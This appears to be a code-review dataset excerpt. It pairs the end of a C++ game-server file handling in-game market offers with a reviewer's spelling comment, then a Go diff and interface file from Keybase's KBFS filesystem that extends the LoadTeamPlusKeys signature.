player->getGUID()) { return; } if (offer.type == MARKETACTION_BUY) { player->bankBalance += static_cast<uint64_t>(offer.price) * offer.amount; player->sendMarketEnter(player->getLastDepotId()); } else { const ItemType& it = Item::items[offer.itemId]; if (it.id == 0) { return; } if (it.stackable) { uint16_t tmpAmount = offer.amount; while (tmpAmount > 0) { int32_t stackCount = std::min<int32_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, stackCount); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < offer.amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } } IOMarket::moveOfferToHistory(offer.id, OFFERSTATE_CANCELLED); offer.amount = 0; offer.timestamp += g_config.getNumber(ConfigManager::MARKET_OFFER_DURATION); player->sendMarketCancelOffer(offer); player->sendMarketEnter(player->getLastDepotId()); } void Game::playerAcceptMarketOffer(uint32_t playerId, uint32_t timestamp, uint16_t counter, uint16_t amount) { if (amount == 0 || amount > 64000) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } MarketOfferEx offer = IOMarket::getOfferByCounter(timestamp, counter); if (offer.id == 0) { return; } uint32_t offerAccountId = IOLoginData::getAccountIdByPlayerId(offer.playerId); if (offerAccountId == player->getAccount()) { return; } if (amount > offer.amount) { return; } const ItemType& it = Item::items[offer.itemId]; if (it.id == 0) { return; } uint64_t totalPrice = static_cast<uint64_t>(offer.price) * amount; if (offer.type == MARKETACTION_BUY) { DepotChest* depotChest = player->getDepotChest(player->getLastDepotId(), false); if (!depotChest) { return; } std::forward_list<Item*> itemList = getMarketItemList(it.wareId, amount, depotChest, player->getInbox()); if (itemList.empty()) { return; } Player* buyerPlayer = getPlayerByGUID(offer.playerId); if (!buyerPlayer) { buyerPlayer = new Player(nullptr); if (!IOLoginData::loadPlayerById(buyerPlayer, offer.playerId)) { delete buyerPlayer; return; } } if (it.stackable) { uint16_t tmpAmount = amount; for (Item* item : itemList) { uint16_t removeCount = std::min<uint16_t>(tmpAmount, item->getItemCount()); tmpAmount -= removeCount; internalRemoveItem(item, removeCount); if (tmpAmount == 0) { break; } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } player->bankBalance += totalPrice; if (it.stackable) { uint16_t tmpAmount = amount; while (tmpAmount > 0) { uint16_t stackCount = std::min<uint16_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, stackCount); if (internalAddItem(buyerPlayer->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(buyerPlayer->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } if (buyerPlayer->isOffline()) { IOLoginData::savePlayer(buyerPlayer); delete buyerPlayer; } else { buyerPlayer->onReceiveMail(); } } else { if (totalPrice > (player->getMoney() + player->bankBalance)) { return; } const auto debitCash = std::min(player->getMoney(), totalPrice); const auto debitBank = totalPrice - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; if (it.stackable) { uint16_t tmpAmount = amount; while (tmpAmount > 0) { uint16_t stackCount = std::min<uint16_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, stackCount); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } Player* sellerPlayer = getPlayerByGUID(offer.playerId); if (sellerPlayer) { sellerPlayer->bankBalance += totalPrice; } else { IOLoginData::increaseBankBalance(offer.playerId, totalPrice); } player->onReceiveMail(); } const int32_t marketOfferDuration = g_config.getNumber(ConfigManager::MARKET_OFFER_DURATION); IOMarket::appendHistory(player->getGUID(), (offer.type == MARKETACTION_BUY ? MARKETACTION_SELL : MARKETACTION_BUY), offer.itemId, amount, offer.price, offer.timestamp + marketOfferDuration, OFFERSTATE_ACCEPTEDEX); IOMarket::appendHistory(offer.playerId, offer.type, offer.itemId, amount, offer.price, offer.timestamp + marketOfferDuration, OFFERSTATE_ACCEPTED); offer.amount -= amount; if (offer.amount == 0) { IOMarket::deleteOffer(offer.id); } else { IOMarket::acceptOffer(offer.id, amount); } player->sendMarketEnter(player->getLastDepotId()); offer.timestamp += marketOfferDuration; player->sendMarketAcceptOffer(offer); } void Game::parsePlayerExtendedOpcode(uint32_t playerId, uint8_t opcode, const std::string& buffer) { Player* player = getPlayerByID(playerId); if (!player) { return; } for (CreatureEvent* creatureEvent : player->getCreatureEvents(CREATURE_EVENT_EXTENDED_OPCODE)) { creatureEvent->executeExtendedOpcode(player, opcode, buffer); } } std::forward_list<Item*> Game::getMarketItemList(uint16_t wareId, uint16_t sufficientCount, DepotChest* depotChest, Inbox* inbox) { std::forward_list<Item*> itemList; uint16_t count = 0; std::list<Container*> containers { depotChest, inbox }; do { Container* container = containers.front(); containers.pop_front(); for (Item* item : container->getItemList()) { Container* c = item->getContainer(); if (c && !c->empty()) { containers.push_back(c); continue; } const ItemType& itemType = Item::items[item->getID()]; if (itemType.wareId != wareId) { continue; } if (c && (!itemType.isContainer() || c->capacity() != itemType.maxItems)) { continue; } if (!item->hasMarketAttributes()) { continue; } itemList.push_front(item); count += Item::countByType(item, -1); if (count >= sufficientCount) { return itemList; } } } while (!containers.empty()); return std::forward_list<Item*>(); } void Game::forceAddCondition(uint32_t creatureId, Condition* condition) { Creature* creature = getCreatureByID(creatureId); if (!creature) { delete condition; return; } creature->addCondition(condition, true); } void Game::forceRemoveCondition(uint32_t creatureId, ConditionType_t type) { Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } creature->removeCondition(type, true); } void Game::sendOfflineTrainingDialog(Player* player) { if (!player) { return; } if (!player->hasModalWindowOpen(offlineTrainingWindow.id)) { player->sendModalWindow(offlineTrainingWindow); } } void Game::playerAnswerModalWindow(uint32_t playerId, uint32_t modalWindowId, uint8_t button, uint8_t choice) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->hasModalWindowOpen(modalWindowId)) { return; } player->onModalWindowHandled(modalWindowId); // offline training, hard-coded if (modalWindowId == std::numeric_limits<uint32_t>::max()) { if (button == offlineTrainingWindow.defaultEnterButton) { if (choice == SKILL_SWORD || choice == SKILL_AXE || choice == SKILL_CLUB || choice == SKILL_DISTANCE || choice == SKILL_MAGLEVEL) { BedItem* bedItem = player->getBedItem(); if (bedItem && bedItem->sleep(player)) { player->setOfflineTrainingSkill(choice); return; } } } else { player->sendTextMessage(MESSAGE_EVENT_ADVANCE, "Offline training aborted."); } player->setBedItem(nullptr); } else { for (auto creatureEvent : player->getCreatureEvents(CREATURE_EVENT_MODALWINDOW)) { creatureEvent->executeModalWindow(player, modalWindowId, button, choice); } } } void Game::addPlayer(Player* player) { const std::string& lowercase_name = asLowerCaseString(player->getName()); mappedPlayerNames[lowercase_name] = player; mappedPlayerGuids[player->getGUID()] = player; wildcardTree.insert(lowercase_name); players[player->getID()] = player; } void Game::removePlayer(Player* player) { const std::string& lowercase_name = asLowerCaseString(player->getName()); mappedPlayerNames.erase(lowercase_name); mappedPlayerGuids.erase(player->getGUID()); wildcardTree.remove(lowercase_name); players.erase(player->getID()); } void Game::addNpc(Npc* npc) { npcs[npc->getID()] = npc; } void Game::removeNpc(Npc* npc) { npcs.erase(npc->getID()); } void Game::addMonster(Monster* monster) { monsters[monster->getID()] = monster; } void Game::removeMonster(Monster* monster) { monsters.erase(monster->getID()); } Guild* Game::getGuild(uint32_t id) const { auto it = guilds.find(id); if (it == guilds.end()) { return nullptr; } return it->second; } void Game::addGuild(Guild* guild) { guilds[guild->getId()] = guild; } void Game::removeGuild(uint32_t guildId) { guilds.erase(guildId); } void Game::decreaseBrowseFieldRef(const Position& pos) { Tile* tile = map.getTile(pos.x, pos.y, pos.z); if (!tile) { return; } auto it = browseFields.find(tile); if (it != browseFields.end()) { it->second->decrementReferenceCounter(); } } void Game::internalRemoveItems(std::vector<Item*> itemList, uint32_t amount, bool stackable) { if (stackable) { for (Item* item : itemList) { if (item->getItemCount() > amount) { internalRemoveItem(item, amount); break; } else { amount -= item->getItemCount(); internalRemoveItem(item); } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } } BedItem* Game::getBedBySleeper(uint32_t guid) const { auto it = bedSleepersMap.find(guid); if (it == bedSleepersMap.end()) { return nullptr; } return it->second; } void Game::setBedSleeper(BedItem* bed, uint32_t guid) { bedSleepersMap[guid] = bed; } void Game::removeBedSleeper(uint32_t guid) { auto it = bedSleepersMap.find(guid); if (it != bedSleepersMap.end()) { bedSleepersMap.erase(it); } } Item* Game::getUniqueItem(uint16_t uniqueId) { auto it = uniqueItems.find(uniqueId); if (it == uniqueItems.end()) { return nullptr; } return it->second; } bool Game::addUniqueItem(uint16_t uniqueId, Item* item) { auto result = uniqueItems.emplace(uniqueId, item); if (!result.second) { std::cout << "Duplicate unique id: " << uniqueId << std::endl; } return result.second; } void Game::removeUniqueItem(uint16_t uniqueId) { auto it = uniqueItems.find(uniqueId); if (it != uniqueItems.end()) { uniqueItems.erase(it); } } bool Game::reload(ReloadTypes_t reloadType) { switch (reloadType) { case RELOAD_TYPE_ACTIONS: return g_actions->reload(); case RELOAD_TYPE_CHAT: return g_chat->load(); case RELOAD_TYPE_CONFIG: return g_config.reload(); case RELOAD_TYPE_CREATURESCRIPTS: { g_creatureEvents->reload(); g_creatureEvents->removeInvalidEvents(); return true; } case RELOAD_TYPE_EVENTS: return g_events->load(); case RELOAD_TYPE_GLOBALEVENTS: return g_globalEvents->reload(); case RELOAD_TYPE_ITEMS: return Item::items.reload(); case RELOAD_TYPE_MONSTERS: return g_monsters.reload(); case RELOAD_TYPE_MOUNTS: return mounts.reload(); case RELOAD_TYPE_MOVEMENTS: return g_moveEvents->reload(); case RELOAD_TYPE_NPCS: { Npcs::reload(); return true; } case RELOAD_TYPE_QUESTS: return quests.reload(); case RELOAD_TYPE_RAIDS: return raids.reload() && raids.startup(); case RELOAD_TYPE_SPELLS: { if (!g_spells->reload()) { std::cout << "[Error - Game::reload] Failed to reload spells." << std::endl; std::terminate(); } else if (!g_monsters.reload()) { std::cout << "[Error - Game::reload] Failed to reload monsters." << std::endl; std::terminate(); } return true; } case RELOAD_TYPE_TALKACTIONS: return g_talkActions->reload(); case RELOAD_TYPE_WEAPONS: { bool results = g_weapons->reload(); g_weapons->loadDefaults(); return results; } case RELOAD_TYPE_SCRIPTS: { // commented out stuff is TODO, once we approach further in revscriptsys g_actions->clear(true); g_creatureEvents->clear(true); g_moveEvents->clear(true); g_talkActions->clear(true); g_globalEvents->clear(true); g_weapons->clear(true); g_weapons->loadDefaults(); g_spells->clear(true); g_scripts->loadScripts("scripts", false, true); g_creatureEvents->removeInvalidEvents(); /* Npcs::reload(); raids.reload() && raids.startup(); Item::items.reload(); quests.reload(); mounts.reload(); g_config.reload(); g_events->load(); g_chat->load(); */ return true; } default: { if (!g_spells->reload()) { std::cout << "[Error - Game::reload] Failed to reload spells." << std::endl; std::terminate(); } else if (!g_monsters.reload()) { std::cout << "[Error - Game::reload] Failed to reload monsters." << std::endl; std::terminate(); } g_actions->reload(); g_config.reload(); g_creatureEvents->reload(); g_monsters.reload(); g_moveEvents->reload(); Npcs::reload(); raids.reload() && raids.startup(); g_talkActions->reload(); Item::items.reload(); g_weapons->reload(); g_weapons->clear(true); g_weapons->loadDefaults(); quests.reload(); mounts.reload(); g_globalEvents->reload(); g_events->load(); g_chat->load(); g_actions->clear(true); g_creatureEvents->clear(true); g_moveEvents->clear(true); g_talkActions->clear(true); g_globalEvents->clear(true); g_spells->clear(true); g_scripts->loadScripts("scripts", false, true); g_creatureEvents->removeInvalidEvents(); return true; } } return true; }
1
19,649
spelling (variable name, all three changes)
otland-forgottenserver
cpp
@@ -411,8 +411,16 @@ type KeybaseService interface { []keybase1.PublicKey, error) // LoadTeamPlusKeys returns a TeamInfo struct for a team with the - // specified TeamID. - LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID) (TeamInfo, error) + // specified TeamID. The caller can specify `desiredKeyGen` to + // force a server check if that particular key gen isn't yet + // known; it may be set to UnspecifiedKeyGen if no server check is + // required. The caller can specify `desiredUID` to force a + // server check if that particular UID isn't a member of the team + // yet according to local caches; it may be set to "" if no server + // check is required. + LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID, + desiredKeyGen KeyGen, desiredUser keybase1.UserVersion, + desiredRole keybase1.TeamRole) (TeamInfo, error) // CurrentSession returns a SessionInfo struct with all the // information for the current session, or an error otherwise.
1
// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "time" "github.com/keybase/client/go/libkb" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "github.com/keybase/kbfs/kbfsblock" "github.com/keybase/kbfs/kbfscodec" "github.com/keybase/kbfs/kbfscrypto" "github.com/keybase/kbfs/kbfsmd" "github.com/keybase/kbfs/tlf" metrics "github.com/rcrowley/go-metrics" "golang.org/x/net/context" ) type dataVersioner interface { // DataVersion returns the data version for this block DataVersion() DataVer } type logMaker interface { MakeLogger(module string) logger.Logger } type blockCacher interface { BlockCache() BlockCache } type keyGetterGetter interface { keyGetter() blockKeyGetter } type codecGetter interface { Codec() kbfscodec.Codec } type blockServerGetter interface { BlockServer() BlockServer } type cryptoPureGetter interface { cryptoPure() cryptoPure } type cryptoGetter interface { Crypto() Crypto } type currentSessionGetterGetter interface { CurrentSessionGetter() CurrentSessionGetter } type signerGetter interface { Signer() kbfscrypto.Signer } type diskBlockCacheGetter interface { DiskBlockCache() DiskBlockCache } type diskBlockCacheSetter interface { SetDiskBlockCache(DiskBlockCache) } type clockGetter interface { Clock() Clock } type diskLimiterGetter interface { DiskLimiter() DiskLimiter } // Block just needs to be (de)serialized using msgpack type Block interface { dataVersioner // GetEncodedSize returns the encoded size of this block, but only // if it has been previously set; otherwise it returns 0. GetEncodedSize() uint32 // SetEncodedSize sets the encoded size of this block, locally // caching it. The encoded size is not serialized. SetEncodedSize(size uint32) // NewEmpty returns a new block of the same type as this block NewEmpty() Block // Set sets this block to the same value as the passed-in block Set(other Block) // ToCommonBlock retrieves this block as a *CommonBlock. ToCommonBlock() *CommonBlock } // NodeID is a unique but transient ID for a Node. That is, two Node // objects in memory at the same time represent the same file or // directory if and only if their NodeIDs are equal (by pointer). type NodeID interface { // ParentID returns the NodeID of the directory containing the // pointed-to file or directory, or nil if none exists. ParentID() NodeID } // Node represents a direct pointer to a file or directory in KBFS. // It is somewhat like an inode in a regular file system. Users of // KBFS can use Node as a handle when accessing files or directories // they have previously looked up. type Node interface { // GetID returns the ID of this Node. This should be used as a // map key instead of the Node itself. GetID() NodeID // GetFolderBranch returns the folder ID and branch for this Node. GetFolderBranch() FolderBranch // GetBasename returns the current basename of the node, or "" // if the node has been unlinked. GetBasename() string } // KBFSOps handles all file system operations. Expands all indirect // pointers. Operations that modify the server data change all the // block IDs along the path, and so must return a path with the new // BlockIds so the caller can update their references. // // KBFSOps implementations must guarantee goroutine-safety of calls on // a per-top-level-folder basis. // // There are two types of operations that could block: // * remote-sync operations, that need to synchronously update the // MD for the corresponding top-level folder. When these // operations return successfully, they will have guaranteed to // have successfully written the modification to the KBFS servers. // * remote-access operations, that don't sync any modifications to KBFS // servers, but may block on reading data from the servers. // // KBFSOps implementations are supposed to give git-like consistency // semantics for modification operations; they will be visible to // other clients immediately after the remote-sync operations succeed, // if and only if there was no other intervening modification to the // same folder. If not, the change will be sync'd to the server in a // special per-device "unmerged" area before the operation succeeds. // In this case, the modification will not be visible to other clients // until the KBFS code on this device performs automatic conflict // resolution in the background. // // All methods take a Context (see https://blog.golang.org/context), // and if that context is cancelled during the operation, KBFSOps will // abort any blocking calls and return ctx.Err(). Any notifications // resulting from an operation will also include this ctx (or a // Context derived from it), allowing the caller to determine whether // the notification is a result of their own action or an external // action. type KBFSOps interface { // GetFavorites returns the logged-in user's list of favorite // top-level folders. This is a remote-access operation. GetFavorites(ctx context.Context) ([]Favorite, error) // RefreshCachedFavorites tells the instances to forget any cached // favorites list and fetch a new list from the server. The // effects are asychronous; if there's an error refreshing the // favorites, the cached favorites will become empty. RefreshCachedFavorites(ctx context.Context) // AddFavorite adds the favorite to both the server and // the local cache. AddFavorite(ctx context.Context, fav Favorite) error // DeleteFavorite deletes the favorite from both the server and // the local cache. Idempotent, so it succeeds even if the folder // isn't favorited. DeleteFavorite(ctx context.Context, fav Favorite) error // GetTLFCryptKeys gets crypt key of all generations as well as // TLF ID for tlfHandle. The returned keys (the keys slice) are ordered by // generation, starting with the key for FirstValidKeyGen. GetTLFCryptKeys(ctx context.Context, tlfHandle *TlfHandle) ( keys []kbfscrypto.TLFCryptKey, id tlf.ID, err error) // GetTLFID gets the TLF ID for tlfHandle. GetTLFID(ctx context.Context, tlfHandle *TlfHandle) (tlf.ID, error) // GetOrCreateRootNode returns the root node and root entry // info associated with the given TLF handle and branch, if // the logged-in user has read permissions to the top-level // folder. It creates the folder if one doesn't exist yet (and // branch == MasterBranch), and the logged-in user has write // permissions to the top-level folder. This is a // remote-access operation. GetOrCreateRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) // GetRootNode is like GetOrCreateRootNode but if the root node // does not exist it will return a nil Node and not create it. GetRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) // GetDirChildren returns a map of children in the directory, // mapped to their EntryInfo, if the logged-in user has read // permission for the top-level folder. This is a remote-access // operation. GetDirChildren(ctx context.Context, dir Node) (map[string]EntryInfo, error) // Lookup returns the Node and entry info associated with a // given name in a directory, if the logged-in user has read // permissions to the top-level folder. The returned Node is nil // if the name is a symlink. This is a remote-access operation. Lookup(ctx context.Context, dir Node, name string) (Node, EntryInfo, error) // Stat returns the entry info associated with a // given Node, if the logged-in user has read permissions to the // top-level folder. This is a remote-access operation. Stat(ctx context.Context, node Node) (EntryInfo, error) // CreateDir creates a new subdirectory under the given node, if // the logged-in user has write permission to the top-level // folder. Returns the new Node for the created subdirectory, and // its new entry info. This is a remote-sync operation. CreateDir(ctx context.Context, dir Node, name string) ( Node, EntryInfo, error) // CreateFile creates a new file under the given node, if the // logged-in user has write permission to the top-level folder. // Returns the new Node for the created file, and its new // entry info. excl (when implemented) specifies whether this is an exclusive // create. Semantically setting excl to WithExcl is like O_CREAT|O_EXCL in a // Unix open() call. // // This is a remote-sync operation. CreateFile(ctx context.Context, dir Node, name string, isExec bool, excl Excl) ( Node, EntryInfo, error) // CreateLink creates a new symlink under the given node, if the // logged-in user has write permission to the top-level folder. // Returns the new entry info for the created symlink. This // is a remote-sync operation. CreateLink(ctx context.Context, dir Node, fromName string, toPath string) ( EntryInfo, error) // RemoveDir removes the subdirectory represented by the given // node, if the logged-in user has write permission to the // top-level folder. Will return an error if the subdirectory is // not empty. This is a remote-sync operation. RemoveDir(ctx context.Context, dir Node, dirName string) error // RemoveEntry removes the directory entry represented by the // given node, if the logged-in user has write permission to the // top-level folder. This is a remote-sync operation. RemoveEntry(ctx context.Context, dir Node, name string) error // Rename performs an atomic rename operation with a given // top-level folder if the logged-in user has write permission to // that folder, and will return an error if nodes from different // folders are passed in. Also returns an error if the new name // already has an entry corresponding to an existing directory // (only non-dir types may be renamed over). This is a // remote-sync operation. Rename(ctx context.Context, oldParent Node, oldName string, newParent Node, newName string) error // Read fills in the given buffer with data from the file at the // given node starting at the given offset, if the logged-in user // has read permission to the top-level folder. The read data // reflects any outstanding writes and truncates to that file that // have been written through this KBFSOps object, even if those // writes have not yet been sync'd. There is no guarantee that // Read returns all of the requested data; it will return the // number of bytes that it wrote to the dest buffer. Reads on an // unlinked file may or may not succeed, depending on whether or // not the data has been cached locally. If (0, nil) is returned, // that means EOF has been reached. This is a remote-access // operation. Read(ctx context.Context, file Node, dest []byte, off int64) (int64, error) // Write modifies the file at the given node, by writing the given // buffer at the given offset within the file, if the logged-in // user has write permission to the top-level folder. It // overwrites any data already there, and extends the file size as // necessary to accomodate the new data. It guarantees to write // the entire buffer in one operation. Writes on an unlinked file // may or may not succeed as no-ops, depending on whether or not // the necessary blocks have been locally cached. This is a // remote-access operation. Write(ctx context.Context, file Node, data []byte, off int64) error // Truncate modifies the file at the given node, by either // shrinking or extending its size to match the given size, if the // logged-in user has write permission to the top-level folder. // If extending the file, it pads the new data with 0s. Truncates // on an unlinked file may or may not succeed as no-ops, depending // on whether or not the necessary blocks have been locally // cached. This is a remote-access operation. Truncate(ctx context.Context, file Node, size uint64) error // SetEx turns on or off the executable bit on the file // represented by a given node, if the logged-in user has write // permissions to the top-level folder. This is a remote-sync // operation. SetEx(ctx context.Context, file Node, ex bool) error // SetMtime sets the modification time on the file represented by // a given node, if the logged-in user has write permissions to // the top-level folder. If mtime is nil, it is a noop. This is // a remote-sync operation. SetMtime(ctx context.Context, file Node, mtime *time.Time) error // SyncAll flushes all outstanding writes and truncates for any // dirty files to the KBFS servers within the given folder, if the // logged-in user has write permissions to the top-level folder. // If done through a file system interface, this may include // modifications done via multiple file handles. This is a // remote-sync operation. SyncAll(ctx context.Context, folderBranch FolderBranch) error // FolderStatus returns the status of a particular folder/branch, along // with a channel that will be closed when the status has been // updated (to eliminate the need for polling this method). FolderStatus(ctx context.Context, folderBranch FolderBranch) ( FolderBranchStatus, <-chan StatusUpdate, error) // Status returns the status of KBFS, along with a channel that will be // closed when the status has been updated (to eliminate the need for // polling this method). Note that this channel only applies to // connection status changes. // // KBFSStatus can be non-empty even if there is an error. Status(ctx context.Context) ( KBFSStatus, <-chan StatusUpdate, error) // UnstageForTesting clears out this device's staged state, if // any, and fast-forwards to the current head of this // folder-branch. UnstageForTesting(ctx context.Context, folderBranch FolderBranch) error // RequestRekey requests to rekey this folder. Note that this asynchronously // requests a rekey, so canceling ctx doesn't cancel the rekey. RequestRekey(ctx context.Context, id tlf.ID) // SyncFromServerForTesting blocks until the local client has // contacted the server and guaranteed that all known updates // for the given top-level folder have been applied locally // (and notifications sent out to any observers). It returns // an error if this folder-branch is currently unmerged or // dirty locally. SyncFromServerForTesting(ctx context.Context, folderBranch FolderBranch) error // GetUpdateHistory returns a complete history of all the merged // updates of the given folder, in a data structure that's // suitable for encoding directly into JSON. This is an expensive // operation, and should only be used for ocassional debugging. // Note that the history does not include any unmerged changes or // outstanding writes from the local device. GetUpdateHistory(ctx context.Context, folderBranch FolderBranch) ( history TLFUpdateHistory, err error) // GetEditHistory returns a clustered list of the most recent file // edits by each of the valid writers of the given folder. users // looking to get updates to this list can register as an observer // for the folder. GetEditHistory(ctx context.Context, folderBranch FolderBranch) ( edits TlfWriterEdits, err error) // GetNodeMetadata gets metadata associated with a Node. GetNodeMetadata(ctx context.Context, node Node) (NodeMetadata, error) // Shutdown is called to clean up any resources associated with // this KBFSOps instance. Shutdown(ctx context.Context) error // PushConnectionStatusChange updates the status of a service for // human readable connection status tracking. PushConnectionStatusChange(service string, newStatus error) // PushStatusChange causes Status listeners to be notified via closing // the status channel. PushStatusChange() // ClearPrivateFolderMD clears any cached private folder metadata, // e.g. on a logout. ClearPrivateFolderMD(ctx context.Context) // ForceFastForward forwards the nodes of all folders that have // been previously cleared with `ClearPrivateFolderMD` to their // newest version. It works asynchronously, so no error is // returned. ForceFastForward(ctx context.Context) // TeamNameChanged indicates that a team has changed its name, and // we should clean up any outstanding handle info associated with // the team ID. TeamNameChanged(ctx context.Context, tid keybase1.TeamID) } type merkleSeqNoGetter interface { // GetCurrentMerkleSeqNo returns the current sequence number of the // global Keybase Merkle tree. GetCurrentMerkleSeqNo(ctx context.Context) (MerkleSeqNo, error) } // KeybaseService is an interface for communicating with the keybase // service. type KeybaseService interface { merkleSeqNoGetter // Resolve, given an assertion, resolves it to a username/UID // pair. The username <-> UID mapping is trusted and // immutable, so it can be cached. If the assertion is just // the username or a UID assertion, then the resolution can // also be trusted. If the returned pair is equal to that of // the current session, then it can also be // trusted. Otherwise, Identify() needs to be called on the // assertion before the assertion -> (username, UID) mapping // can be trusted. Resolve(ctx context.Context, assertion string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) // Identify, given an assertion, returns a UserInfo struct // with the user that matches that assertion, or an error // otherwise. The reason string is displayed on any tracker // popups spawned. Identify(ctx context.Context, assertion, reason string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) // LoadUserPlusKeys returns a UserInfo struct for a // user with the specified UID. // If you have the UID for a user and don't require Identify to // validate an assertion or the identity of a user, use this to // get UserInfo structs as it is much cheaper than Identify. // // pollForKID, if non empty, causes `PollForKID` field to be populated, which // causes the service to poll for the given KID. This is useful during // provisioning where the provisioner needs to get the MD revision that the // provisionee has set the rekey bit on. LoadUserPlusKeys(ctx context.Context, uid keybase1.UID, pollForKID keybase1.KID) (UserInfo, error) // LoadUnverifiedKeys returns a list of unverified public keys. They are the union // of all known public keys associated with the account and the currently verified // keys currently part of the user's sigchain. LoadUnverifiedKeys(ctx context.Context, uid keybase1.UID) ( []keybase1.PublicKey, error) // LoadTeamPlusKeys returns a TeamInfo struct for a team with the // specified TeamID. LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID) (TeamInfo, error) // CurrentSession returns a SessionInfo struct with all the // information for the current session, or an error otherwise. CurrentSession(ctx context.Context, sessionID int) (SessionInfo, error) // FavoriteAdd adds the given folder to the list of favorites. FavoriteAdd(ctx context.Context, folder keybase1.Folder) error // FavoriteAdd removes the given folder from the list of // favorites. FavoriteDelete(ctx context.Context, folder keybase1.Folder) error // FavoriteList returns the current list of favorites. FavoriteList(ctx context.Context, sessionID int) ([]keybase1.Folder, error) // Notify sends a filesystem notification. Notify(ctx context.Context, notification *keybase1.FSNotification) error // NotifySyncStatus sends a sync status notification. NotifySyncStatus(ctx context.Context, status *keybase1.FSPathSyncStatus) error // FlushUserFromLocalCache instructs this layer to clear any // KBFS-side, locally-cached information about the given user. // This does NOT involve communication with the daemon, this is // just to force future calls loading this user to fall through to // the daemon itself, rather than being served from the cache. FlushUserFromLocalCache(ctx context.Context, uid keybase1.UID) // FlushUserUnverifiedKeysFromLocalCache instructs this layer to clear any // KBFS-side, locally-cached unverified keys for the given user. FlushUserUnverifiedKeysFromLocalCache(ctx context.Context, uid keybase1.UID) // TODO: Add CryptoClient methods, too. // EstablishMountDir asks the service for the current mount path // and sets it if not established. EstablishMountDir(ctx context.Context) (string, error) // Shutdown frees any resources associated with this // instance. No other methods may be called after this is // called. Shutdown() } // KeybaseServiceCn defines methods needed to construct KeybaseService // and Crypto implementations. type KeybaseServiceCn interface { NewKeybaseService(config Config, params InitParams, ctx Context, log logger.Logger) (KeybaseService, error) NewCrypto(config Config, params InitParams, ctx Context, log logger.Logger) (Crypto, error) } type resolver interface { // Resolve, given an assertion, resolves it to a username/UID // pair. The username <-> UID mapping is trusted and // immutable, so it can be cached. If the assertion is just // the username or a UID assertion, then the resolution can // also be trusted. If the returned pair is equal to that of // the current session, then it can also be // trusted. Otherwise, Identify() needs to be called on the // assertion before the assertion -> (username, UserOrTeamID) mapping // can be trusted. // // TODO: some of the above assumptions on cacheability aren't // right for subteams, which can change their name, so this may // need updating. Resolve(ctx context.Context, assertion string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) } type identifier interface { // Identify resolves an assertion (which could also be a // username) to a UserInfo struct, spawning tracker popups if // necessary. The reason string is displayed on any tracker // popups spawned. Identify(ctx context.Context, assertion, reason string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) } type normalizedUsernameGetter interface { // GetNormalizedUsername returns the normalized username // corresponding to the given UID. GetNormalizedUsername(ctx context.Context, id keybase1.UserOrTeamID) ( libkb.NormalizedUsername, error) } // CurrentSessionGetter is an interface for objects that can return // session info. type CurrentSessionGetter interface { // GetCurrentSession gets the current session info. GetCurrentSession(ctx context.Context) (SessionInfo, error) } // TeamMembershipChecker is an interface for objects that can check // the writer/reader membership of teams. type TeamMembershipChecker interface { // IsTeamWriter checks whether the given user is a writer of the // given team right now. IsTeamWriter(ctx context.Context, tid keybase1.TeamID, uid keybase1.UID) ( bool, error) // IsTeamReader checks whether the given user is a reader of the // given team right now. IsTeamReader(ctx context.Context, tid keybase1.TeamID, uid keybase1.UID) ( bool, error) // TODO: add Was* method for figuring out whether the user was a // writer/reader at a particular Merkle sequence number. Not sure // whether these calls should also verify that sequence number // corresponds to a given TLF revision, or leave that work to // another component. } type teamKeysGetter interface { // GetTeamTLFCryptKeys gets all of a team's secret crypt keys, by // generation, as well as the latest key generation number for the // team. GetTeamTLFCryptKeys(ctx context.Context, tid keybase1.TeamID) ( map[KeyGen]kbfscrypto.TLFCryptKey, KeyGen, error) } // KBPKI interacts with the Keybase daemon to fetch user info. type KBPKI interface { CurrentSessionGetter resolver identifier normalizedUsernameGetter merkleSeqNoGetter TeamMembershipChecker teamKeysGetter // HasVerifyingKey returns nil if the given user has the given // VerifyingKey, and an error otherwise. 